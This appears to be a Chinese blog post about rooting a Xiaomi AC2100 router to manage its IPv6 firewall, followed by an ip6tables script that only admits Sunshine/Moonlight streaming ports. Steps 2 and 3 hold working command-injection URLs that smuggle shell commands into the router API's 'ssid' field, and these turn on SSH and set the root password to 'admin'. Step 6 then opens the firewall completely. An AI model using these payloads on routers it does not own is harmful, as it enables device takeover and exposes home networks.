小米路由器AC2100关闭IPV6防火墙

小米路由器AC2100关闭IPV6防火墙

参考

https://github.com/AXFOX/openwrt-AC2100

步骤

  1. http://192.168.31.1/cgi-bin/luci/;stok=???/web/home#router
  2. http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
  3. http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27admin%5Cnadmin%27%20%7C%20passwd%20root%0A
  4. 以上是通过脚本注入重置root密码 admin
  5. ssh root@192.168.31.1
  6. ip6tables -F;ip6tables -X;ip6tables -P INPUT ACCEPT;ip6tables -P OUTPUT ACCEPT;ip6tables -P FORWARD ACCEPT

常见问题

Unable to negotiate with 192.168.31.1 port 22: no matching host key type found. Their offer: ssh-rsa

解决 ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.31.1

为了安全 下面是我只允许sunshine+moonlight串流的规则

# ======================
# 1. 配置参数
# ======================

# Sunshine + Moonlight 所需端口列表
# TCP: 47984, 47989:47990, 47998:48000, 48010, 53333
# UDP: 47984, 47998:48000, 48010
# 考虑到用户给出的端口列表,这里将进行整合。
PORTS_TCP="47984 47989 47990 47998 47999 48000 48010 53333"
PORTS_UDP="47984 47998 47999 48000 48010"

# 路由器 WAN 口的接口名称
WAN_INTERFACE="pppoe-wan"
# 内部局域网的接口名称
LAN_INTERFACE="br-lan"

# ======================
# 2. 清除旧规则 (在测试时很有用)
# ======================
ip6tables -F
ip6tables -X
ip6tables -Z

# ======================
# 3. 基础防火墙策略
# ======================
# 默认策略:允许发出的,但阻止进来的和转发的
ip6tables -P INPUT DROP
ip6tables -P FORWARD DROP
ip6tables -P OUTPUT ACCEPT

# 允许已建立和相关连接通过
ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
ip6tables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

# 允许本地环回接口
ip6tables -A INPUT -i lo -j ACCEPT

# 允许 ICMPv6 (IPv6 协议正常运行所必需)
ip6tables -A INPUT -p icmpv6 -j ACCEPT

# ======================
# 4. Sunshine + Moonlight 端口放行规则
# ======================

# 遍历 TCP 端口列表,允许来自公网的流量转发到内网
for port in $PORTS_TCP; do
  # 将流量从 WAN 接口转发到 LAN 接口,目标端口为 Sunshine TCP 端口
  ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p tcp --dport $port -j ACCEPT
done

# 遍历 UDP 端口列表,允许来自公网的流量转发到内网
for port in $PORTS_UDP; do
  # 将流量从 WAN 接口转发到 LAN 接口,目标端口为 Sunshine UDP 端口
  ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p udp --dport $port -j ACCEPT
done

# 允许 UPnP / NAT-PMP 自动端口映射的流量(如果 Sunshine 配置了 UPnP)
ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p udp --dport 1900 -j ACCEPT
ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p udp --dport 5351 -j ACCEPT

# ======================
# 5. 安全加固
# ======================

# 阻止无效数据包
ip6tables -A INPUT -m conntrack --ctstate INVALID -j DROP
ip6tables -A FORWARD -m conntrack --ctstate INVALID -j DROP

# 防止常见的 SYN 攻击
ip6tables -A FORWARD -p tcp --tcp-flags SYN,ACK SYN,ACK -m state --state NEW -j DROP

echo "IPv6 Sunshine firewall rules have been applied successfully."

查看IPV6 ip

curl -6 https://ident.me

curl -6 https://api6.ipify.org

posted @ 2025-08-15 08:43  狂客  阅读(263)  评论(0)    收藏  举报